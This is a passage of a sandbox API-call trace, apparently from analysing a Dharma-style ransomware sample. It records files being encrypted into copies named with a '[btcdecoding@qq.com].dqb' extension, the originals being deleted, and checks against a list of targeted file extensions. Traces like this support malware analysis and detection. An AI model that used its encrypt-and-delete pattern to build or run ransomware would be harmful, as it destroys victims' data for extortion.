[0060.542] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.542] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.543] GetLastError () returned 0x0 [0060.543] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x244, lpOverlapped=0x0) returned 1 [0060.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x250, lpOverlapped=0x0) returned 1 [0060.545] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.545] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.545] SetEndOfFile (hFile=0x1a4) returned 1 [0060.545] CloseHandle (hObject=0x1a4) returned 1 [0060.545] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.545] SetEndOfFile (hFile=0x158) returned 1 [0060.546] CloseHandle (hObject=0x158) returned 1 [0060.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.546] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf")) returned 1 [0060.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0060.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0060.547] lstrlenW (lpString=".doc") returned 4 [0060.547] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.547] lstrlenW (lpString=".docx") returned 5 [0060.547] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.547] lstrlenW (lpString=".pdf") returned 4 [0060.547] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.547] lstrlenW (lpString=".xls") returned 4 [0060.547] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.547] lstrlenW (lpString=".xlsx") returned 5 [0060.547] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.547] lstrlenW (lpString=".ppt") returned 4 [0060.547] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0060.547] lstrlenW (lpString=".zip") returned 4 [0060.547] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.547] lstrlenW (lpString=".rar") returned 4 [0060.547] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.547] lstrlenW (lpString=".bz2") returned 4 [0060.547] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.547] lstrlenW (lpString=".7z") returned 3 [0060.547] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0060.547] lstrlenW (lpString=".dbf") returned 4 [0060.547] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0060.547] lstrlenW (lpString=".1cd") returned 4 [0060.547] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0060.547] lstrlenW (lpString=".jpg") returned 4 [0060.547] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.548] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.548] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.548] GetLastError () returned 0x0 [0060.548] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x128, lpOverlapped=0x0) returned 1 [0060.549] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x130, lpOverlapped=0x0) returned 1 [0060.550] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.550] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.550] SetEndOfFile (hFile=0x1a4) returned 1 [0060.550] CloseHandle (hObject=0x1a4) returned 1 [0060.550] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.550] SetEndOfFile (hFile=0x158) returned 1 [0060.551] CloseHandle (hObject=0x158) returned 1 [0060.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.551] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf")) returned 1 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0060.552] lstrlenW (lpString=".doc") returned 4 [0060.552] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.552] lstrlenW (lpString=".docx") returned 5 [0060.552] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.552] lstrlenW (lpString=".pdf") returned 4 [0060.552] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.552] lstrlenW (lpString=".xls") returned 4 [0060.552] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.552] lstrlenW (lpString=".xlsx") returned 5 [0060.552] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.552] lstrlenW (lpString=".ppt") returned 4 [0060.552] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0060.552] lstrlenW (lpString=".zip") returned 4 [0060.552] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.552] lstrlenW (lpString=".rar") returned 4 [0060.552] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.552] lstrlenW (lpString=".bz2") returned 4 [0060.552] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.552] lstrlenW (lpString=".7z") returned 3 [0060.552] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0060.552] lstrlenW (lpString=".dbf") returned 4 [0060.552] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0060.552] lstrlenW (lpString=".1cd") returned 4 [0060.552] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0060.552] lstrlenW (lpString=".jpg") returned 4 [0060.552] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.553] GetLastError () returned 0x0 [0060.553] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x228, lpOverlapped=0x0) returned 1 [0060.554] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x230, lpOverlapped=0x0) returned 1 [0060.555] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.555] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.555] SetEndOfFile (hFile=0x1a4) returned 1 [0060.555] CloseHandle (hObject=0x1a4) returned 1 [0060.555] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.555] SetEndOfFile (hFile=0x158) returned 1 [0060.556] CloseHandle (hObject=0x158) returned 1 [0060.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.556] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf")) returned 1 [0060.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0060.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0060.556] lstrlenW (lpString=".doc") returned 4 [0060.556] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.556] lstrlenW (lpString=".docx") returned 5 [0060.556] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.557] lstrlenW (lpString=".pdf") returned 4 [0060.557] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.557] lstrlenW (lpString=".xls") returned 4 [0060.557] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.557] lstrlenW (lpString=".xlsx") returned 5 [0060.557] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.557] lstrlenW (lpString=".ppt") returned 4 [0060.557] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0060.557] lstrlenW (lpString=".zip") returned 4 [0060.557] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.557] lstrlenW (lpString=".rar") returned 4 [0060.557] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.557] lstrlenW (lpString=".bz2") returned 4 [0060.557] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.557] lstrlenW (lpString=".7z") returned 3 [0060.557] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0060.557] lstrlenW (lpString=".dbf") returned 4 [0060.557] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0060.557] lstrlenW (lpString=".1cd") returned 4 [0060.557] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0060.557] lstrlenW (lpString=".jpg") returned 4 [0060.557] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.558] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.558] GetLastError () returned 0x0 [0060.558] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1034, lpOverlapped=0x0) returned 1 [0060.899] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1040, lpOverlapped=0x0) returned 1 [0060.949] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.949] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.950] SetEndOfFile (hFile=0x1a4) returned 1 [0061.793] CloseHandle (hObject=0x1a4) returned 1 [0061.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.866] SetEndOfFile (hFile=0x158) Thread: id = 10 os_tid = 0xabc [0032.336] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x610530 [0032.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x620538 [0032.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02a0 [0032.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5aa388 [0032.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02b8 [0032.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3650020 [0032.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02d0 [0032.337] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c02d0, Size=0x20) returned 0x5a5c78 [0032.338] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02d0 [0032.338] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c02d0, Size=0x20) returned 0x5a5ca0 [0032.338] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.338] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.338] Wow64DisableWow64FsRedirection (in: OldValue=0x2b3ff58 | out: OldValue=0x2b3ff58*=0x0) returned 1 [0032.338] lstrlenW (lpString="kernel32.dll") returned 12 [0032.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.338] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.338] Sleep (dwMilliseconds=0x64) [0032.618] Sleep (dwMilliseconds=0x64) [0032.926] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.937] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.937] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.937] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=75344) returned 1 [0032.937] CloseHandle (hObject=0x17c) returned 1 [0032.938] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0032.938] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.938] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.938] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.938] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.938] lstrlenW (lpString=".doc") returned 4 [0032.938] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.938] lstrlenW (lpString=".docx") returned 5 [0032.938] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.938] lstrlenW (lpString=".pdf") returned 4 [0032.938] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.938] lstrlenW (lpString=".xls") returned 4 [0032.938] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.938] lstrlenW (lpString=".xlsx") returned 5 [0032.938] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.938] lstrlenW (lpString=".ppt") returned 4 [0032.938] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.938] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.938] lstrlenW (lpString=".zip") returned 4 [0032.938] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.938] lstrlenW (lpString=".rar") returned 4 [0032.938] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.938] lstrlenW (lpString=".bz2") returned 4 [0032.938] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.938] lstrlenW (lpString=".7z") returned 3 [0032.938] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.938] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.938] lstrlenW (lpString=".dbf") returned 4 [0032.938] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.938] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.938] lstrlenW (lpString=".1cd") returned 4 [0032.938] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.939] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.939] lstrlenW (lpString=".jpg") returned 4 [0032.939] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.939] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.939] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.939] lstrlenW (lpString=".doc") returned 4 [0032.939] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.939] lstrlenW (lpString=".docx") returned 5 [0032.939] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.939] lstrlenW (lpString=".pdf") returned 4 [0032.939] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.939] lstrlenW (lpString=".xls") returned 4 [0032.939] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.939] lstrlenW (lpString=".xlsx") returned 5 [0032.939] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.939] lstrlenW (lpString=".ppt") returned 4 [0032.939] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.939] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.939] lstrlenW (lpString=".zip") returned 4 [0032.939] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.939] lstrlenW (lpString=".rar") returned 4 [0032.940] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.940] lstrlenW (lpString=".bz2") returned 4 [0032.940] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.940] lstrlenW (lpString=".7z") returned 3 [0032.940] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.940] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.940] lstrlenW (lpString=".dbf") returned 4 [0032.940] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.940] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.940] lstrlenW (lpString=".1cd") returned 4 [0032.940] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.940] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0032.940] lstrlenW (lpString=".jpg") returned 4 [0032.940] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.940] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0032.940] lstrlenW (lpString="memtest.exe") returned 11 [0032.940] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.940] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=485760) returned 1 [0032.940] CloseHandle (hObject=0x17c) returned 1 [0032.940] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0032.941] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.941] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.941] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.941] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.941] lstrlenW (lpString=".doc") returned 4 [0032.941] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0032.941] lstrlenW (lpString=".docx") returned 5 [0032.941] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0032.941] lstrlenW (lpString=".pdf") returned 4 [0032.941] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0032.941] lstrlenW (lpString=".xls") returned 4 [0032.941] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0032.941] lstrlenW (lpString=".xlsx") returned 5 [0032.941] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0032.941] lstrlenW (lpString=".ppt") returned 4 [0032.941] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0032.941] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.941] lstrlenW (lpString=".zip") returned 4 [0032.941] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0032.941] lstrlenW (lpString=".rar") returned 4 [0032.941] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0032.941] lstrlenW (lpString=".bz2") returned 4 [0032.941] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0032.941] lstrlenW (lpString=".7z") returned 3 [0032.941] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0032.941] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.941] lstrlenW (lpString=".dbf") returned 4 [0032.941] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0032.941] lstrlenW 